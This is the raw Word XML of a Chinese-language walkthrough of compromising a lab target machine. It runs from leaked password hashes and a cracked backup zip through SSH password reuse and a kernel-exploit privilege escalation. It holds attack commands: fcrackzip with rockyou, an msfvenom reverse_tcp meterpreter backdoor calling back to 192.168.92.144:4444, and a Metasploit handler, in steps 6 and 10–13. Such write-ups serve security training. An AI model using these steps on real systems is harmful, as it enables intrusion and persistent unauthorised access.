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1980" w14:textId="37E0DB02" w:rsidR="00EB3468" w:rsidRDefault="008318D7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.对网页进行访问，并使用burp对http包进行截获</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483EB5DD" w14:textId="0C5778FF" w:rsidR="008318D7" w:rsidRDefault="001F10A0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F75DD30" wp14:editId="24528225">
            <wp:extent cx="5274310" cy="1680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8C6B" w14:textId="231B74F1" w:rsidR="001F10A0" w:rsidRDefault="001F10A0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现其中</w:t>
      </w:r>
      <w:r w:rsidR="007337B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidR="002D59E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>链接</w:t>
      </w:r>
      <w:r w:rsidR="007337B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能存在信息泄露</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F620A3B" w14:textId="77777777" w:rsidR="003B1610" w:rsidRDefault="003B1610"/>
    <w:p w14:paraId="4A74D15F" w14:textId="77777777" w:rsidR="002D59E5" w:rsidRDefault="002D59E5"/>
    <w:p w14:paraId="64D1676E" w14:textId="0BF4D3FA" w:rsidR="002D59E5" w:rsidRDefault="002D59E5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.访问该链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD9433A" w14:textId="1FEAA41E" w:rsidR="002D59E5" w:rsidRDefault="002D59E5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FAAF9F0" wp14:editId="4EBC1125">
            <wp:extent cx="5274310" cy="3775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70D" w14:textId="435071A2" w:rsidR="002D59E5" w:rsidRDefault="002D59E5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>password字段泄露，</w:t>
      </w:r>
      <w:r w:rsidR="007E14D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用cmd5网站解密，得到密码明文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00241D83" w14:textId="490F6C80" w:rsidR="007E14D8" w:rsidRDefault="007E14D8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21684576" wp14:editId="0354034E">
            <wp:extent cx="4797188" cy="1999502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789" cy="20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47EF" w14:textId="121A41E3" w:rsidR="007E14D8" w:rsidRDefault="007E14D8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.继续观测链接，发现还有一处</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145E60EF" w14:textId="37FB0FD4" w:rsidR="00837862" w:rsidRDefault="00837862">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="782485AA" wp14:editId="724ABB29">
            <wp:extent cx="4578824" cy="36984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229" cy="37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DFAF" w14:textId="5FBEFA2A" w:rsidR="00837862" w:rsidRDefault="00837862">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接泄露管理员账户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5467D8" w14:textId="24DAA435" w:rsidR="00837862" w:rsidRDefault="00837862">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同样使用cmd5解密，然后登录，发现网站备份文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DA5A5F" w14:textId="696DF5CB" w:rsidR="00837862" w:rsidRDefault="00837862">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C2D1B3E" wp14:editId="42CDBA39">
            <wp:extent cx="5274310" cy="2002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6BD3" w14:textId="7F93FD9E" w:rsidR="00837862" w:rsidRDefault="00837862">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53C63880" wp14:editId="092D6D60">
            <wp:extent cx="5274310" cy="1965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A4FD" w14:textId="55E3EEE5" w:rsidR="00C90C5F" w:rsidRDefault="00C90C5F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.下载备份文件，发现其是basse64加密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24509A84" w14:textId="4C68A964" w:rsidR="00C90C5F" w:rsidRDefault="00C90C5F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用base64工具解密：base64</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -d myplace.</w:t>
      </w:r>
      <w:r w:rsidR="00F12A93">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>ackup</w:t>
      </w:r>
      <w:r w:rsidR="00F12A93">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F12A93">
        <w:t>&gt; a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663732B3" w14:textId="6EA0E0E7" w:rsidR="00F12A93" w:rsidRDefault="00F12A93"/>
    <w:p w14:paraId="2CE102FE" w14:textId="257604DA" w:rsidR="00F12A93" w:rsidRDefault="00F12A93">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5.使用</w:t>
      </w:r>
      <w:r w:rsidR="00566F22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>file鉴定其类型：file</w:t>
      </w:r>
      <w:r w:rsidR="00566F22">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00566F22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a，结果为zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA4DC43" w14:textId="3EA2D19A" w:rsidR="00566F22" w:rsidRDefault="00566F22"/>
    <w:p w14:paraId="48C4F602" w14:textId="17053D8A" w:rsidR="00A55780" w:rsidRDefault="00566F22">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6.改名为zip后缀，然后使用fcrackzip</w:t>
      </w:r>
      <w:r w:rsidR="00A55780">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>破解压缩包密码：fcrackzip</w:t>
      </w:r>
      <w:r w:rsidR="00A55780">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A55780">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-D</w:t>
      </w:r>
      <w:r w:rsidR="00A55780">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A55780">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-p</w:t>
      </w:r>
      <w:r w:rsidR="00A55780">
        <w:t xml:space="preserve"> /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidR="00A55780">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A55780">
        <w:t>a.zip</w:t>
      </w:r>
      <w:r w:rsidR="00A55780">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，得到密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1697A5" w14:textId="60C47DD7" w:rsidR="00A55780" w:rsidRDefault="00A55780"/>
    <w:p w14:paraId="6D1C8655" w14:textId="03F1B34A" w:rsidR="00A55780" w:rsidRDefault="00A55780">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7.此时已经得到了网站源码，然后进行审计，在</w:t>
      </w:r>
      <w:r w:rsidR="0020309A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r w:rsidR="0020309A">
        <w:t>.js</w:t>
      </w:r>
      <w:r w:rsidR="0020309A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件下看到对mongd</w:t>
      </w:r>
      <w:r w:rsidR="0020309A">
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="0020309A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的账号和密码，然后尝试看看管理员是否比较懒，将ssh远程也设置为这个密码，</w:t>
      </w:r>
      <w:r w:rsidR="007F5B01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试后发现果然是这样，此时得到目标机器shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A77C930" w14:textId="5C2F23AB" w:rsidR="007F5B01" w:rsidRDefault="007F5B01">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4005B725" wp14:editId="41CB0698">
            <wp:extent cx="4476466" cy="120346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423" cy="12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B27" w14:textId="39F2FC2A" w:rsidR="007F5B01" w:rsidRDefault="007F5B01">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E842FDA" wp14:editId="37D5D56B">
            <wp:extent cx="3568889" cy="2727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806" cy="27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D0D" w14:textId="2FBBA4BD" w:rsidR="00C45FD5" w:rsidRDefault="00C45FD5"/>
    <w:p w14:paraId="4CABB868" w14:textId="15DF7C6A" w:rsidR="00C45FD5" w:rsidRDefault="00C45FD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8.查看发行版</w:t>
      </w:r>
      <w:r w:rsidR="00854F3E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和内核</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6011C5B0" w14:textId="61C68895" w:rsidR="00C45FD5" w:rsidRDefault="00C45FD5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AFCCAD3" wp14:editId="3EFDC596">
            <wp:extent cx="3914286" cy="28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304" w14:textId="1D134465" w:rsidR="00C45FD5" w:rsidRDefault="00854F3E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BEE43C8" wp14:editId="4E4736EF">
            <wp:extent cx="5274310" cy="442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9ACE" w14:textId="3754BF84" w:rsidR="00854F3E" w:rsidRDefault="00854F3E"/>
    <w:p w14:paraId="494400BF" w14:textId="14ACE977" w:rsidR="00CD0C31" w:rsidRDefault="00CD0C31">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidR="00123E68">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在msf中查找相关漏洞：</w:t>
      </w:r>
      <w:r w:rsidR="00123E68">
        <w:t>searchsp</w:t>
      </w:r>
      <w:r w:rsidR="00F35EB3">
        <w:t>loit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48852A43" w14:textId="0516BA2D" w:rsidR="00F35EB3" w:rsidRDefault="00F35EB3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="001E5CE0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="001E5CE0">
        <w:t>4298.c</w:t>
      </w:r>
      <w:r w:rsidR="00CC6733">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6006BCA5" w14:textId="77777777" w:rsidR="00A00418" w:rsidRDefault="00A00418"/>
    <w:p w14:paraId="01D79703" w14:textId="31010D01" w:rsidR="00416272" w:rsidRDefault="00736315">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10.在主机上发布漏洞源程序，然后在靶机中</w:t>
      </w:r>
      <w:r w:rsidR="009310CD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选择一个拥有写和执行权限的目录下载编译</w:t>
      </w:r>
      <w:r w:rsidR="002A7171">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并执行</w:t>
      </w:r>
      <w:r w:rsidR="009310CD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源程序</w:t>
      </w:r>
      <w:r w:rsidR="002A7171">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，以达到提权的目的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACC0CA4" w14:textId="0CAAA7B9" w:rsidR="00416272" w:rsidRDefault="00416272">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4628A79E" wp14:editId="31430DCC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1630" w14:textId="00ECE8D6" w:rsidR="00FD72EC" w:rsidRDefault="00FD72EC"/>
    <w:p w14:paraId="124F871A" w14:textId="4004DE21" w:rsidR="00FD72EC" w:rsidRDefault="002A7171">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>11.为了维持权限，方便后续进入靶机，</w:t>
      </w:r>
      <w:r w:rsidR="006B3E49">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要在此设置后门木马，</w:t>
      </w:r>
      <w:r w:rsidR="00E178FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里利用</w:t>
      </w:r>
      <w:r w:rsidR="009475A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidR="009475A1">
        <w:t>venom</w:t>
      </w:r>
      <w:r w:rsidR="009475A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成木马：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CA78E0" w14:textId="651AAF7F" w:rsidR="009475A1" w:rsidRDefault="009475A1">
      <w:r w:rsidRPr="009475A1">
        <w:t>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>92.144</w:t>
      </w:r>
      <w:r w:rsidRPr="009475A1">
        <w:t xml:space="preserve"> LPORT=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4444</w:t>
      </w:r>
      <w:r w:rsidRPr="009475A1">
        <w:t xml:space="preserve"> -f  elf &gt; shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCB9233" w14:textId="5BB47A0E" w:rsidR="00261C17" w:rsidRDefault="00261C17"/>
    <w:p w14:paraId="35BB4886" w14:textId="7BAD9394" w:rsidR="00261C17" w:rsidRDefault="00261C17">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到靶机中下载木马程序，并赋予执行权限：c</w:t>
      </w:r>
      <w:r>
        <w:t>hmod +x shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0381DC" w14:textId="77777777" w:rsidR="00261C17" w:rsidRDefault="00261C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="367ECAEF" w14:textId="15480DA7" w:rsidR="00FD72EC" w:rsidRDefault="00261C17">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>13.</w:t>
      </w:r>
      <w:r w:rsidR="00FD72EC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置监听</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE458F4" w14:textId="084CDE40" w:rsidR="00C07B97" w:rsidRDefault="00C07B97" w:rsidP="00C07B97">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>msf &gt; use exploit/multi/handler  #使用exploit/multi/handler监听从</w:t>
      </w:r>
      <w:r w:rsidR="000E39E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶机</w:t>
      </w:r>
      <w:r>
        <w:t>发来的数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F353C43" w14:textId="58136156" w:rsidR="00C07B97" w:rsidRDefault="00C07B97" w:rsidP="00C07B97">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(handler) &gt; set payload windows/meterpreter/reverse_tcp  #设置payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3855DC50" w14:textId="0DDA3F55" w:rsidR="00C07B97" w:rsidRDefault="00C07B97" w:rsidP="00C07B97">
      <w:r>
        <w:t>msf exploit(handler) &gt; set lhost 192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>92.144</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  #主机ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F1BA36" w14:textId="1D6DB727" w:rsidR="00C07B97" w:rsidRDefault="00C07B97" w:rsidP="00C07B97">
      <w:r>
        <w:t xml:space="preserve">msf exploit(handler) &gt; set lport </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4444</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            #主机端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08406C8E" w14:textId="7BE703DA" w:rsidR="00C07B97" w:rsidRDefault="00C07B97" w:rsidP="00C07B97">
      <w:r>
        <w:t>msf exploit(handler) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688BAED7" w14:textId="4EC14034" w:rsidR="000E39E9" w:rsidRDefault="000E39E9" w:rsidP="00C07B97">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后在靶机上执行木马，主机就能监听到靶机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3535A676" w14:textId="60671791" w:rsidR="00261C17" w:rsidRDefault="000E39E9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AAF43BA" wp14:editId="4536BFC1">
            <wp:extent cx="5274310" cy="17278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850" w14:textId="124BE1D2" w:rsidR="000E39E9" w:rsidRDefault="000E39E9"/>
    <w:p w14:paraId="0422F967" w14:textId="4D907193" w:rsidR="000E39E9" w:rsidRDefault="000E39E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>14.在主机上对靶机进行控制，可以看到权限</w:t>
      </w:r>
      <w:r w:rsidR="007C4369">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本都是可写的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAD1277" w14:textId="0FFEA14D" w:rsidR="00FD72EC" w:rsidRDefault="00FD72EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00FA0D6F" wp14:editId="79172F6D">
            <wp:extent cx="5274310" cy="3925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A1"/>
    <w:rsid w:val="000E39E9"/>
    <w:rsid w:val="00123E68"/>
    <w:rsid w:val="001E5CE0"/>
    <w:rsid w:val="001F10A0"/>
    <w:rsid w:val="00202575"/>
    <w:rsid w:val="0020309A"/>
    <w:rsid w:val="00261C17"/>
    <w:rsid w:val="002A7171"/>
    <w:rsid w:val="002D59E5"/>
    <w:rsid w:val="003B1610"/>
    <w:rsid w:val="00416272"/>
    <w:rsid w:val="00526360"/>
    <w:rsid w:val="00566F22"/>
    <w:rsid w:val="005E0CB1"/>
    <w:rsid w:val="006B3E49"/>
    <w:rsid w:val="007337B2"/>
    <w:rsid w:val="00736315"/>
    <w:rsid w:val="007B0325"/>
    <w:rsid w:val="007C4369"/>
    <w:rsid w:val="007E14D8"/>
    <w:rsid w:val="007F5B01"/>
    <w:rsid w:val="008318D7"/>
    <w:rsid w:val="00837862"/>
    <w:rsid w:val="00850255"/>
    <w:rsid w:val="00854F3E"/>
    <w:rsid w:val="009310CD"/>
    <w:rsid w:val="009475A1"/>
    <w:rsid w:val="00963A4A"/>
    <w:rsid w:val="00A00418"/>
    <w:rsid w:val="00A06FA1"/>
    <w:rsid w:val="00A55780"/>
    <w:rsid w:val="00A80757"/>
    <w:rsid w:val="00C07B97"/>
    <w:rsid w:val="00C1560B"/>
    <w:rsid w:val="00C45FD5"/>
    <w:rsid w:val="00C90C5F"/>
    <w:rsid w:val="00CC6733"/>
    <w:rsid w:val="00CD0C31"/>
    <w:rsid w:val="00D47CAE"/>
    <w:rsid w:val="00E178FB"/>
    <w:rsid w:val="00EB3468"/>
    <w:rsid w:val="00F12A93"/>
    <w:rsid w:val="00F35EB3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ADC6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CF6B8DCC-98CD-4291-B1F0-12149A1D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7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-29T03:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-29T15:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>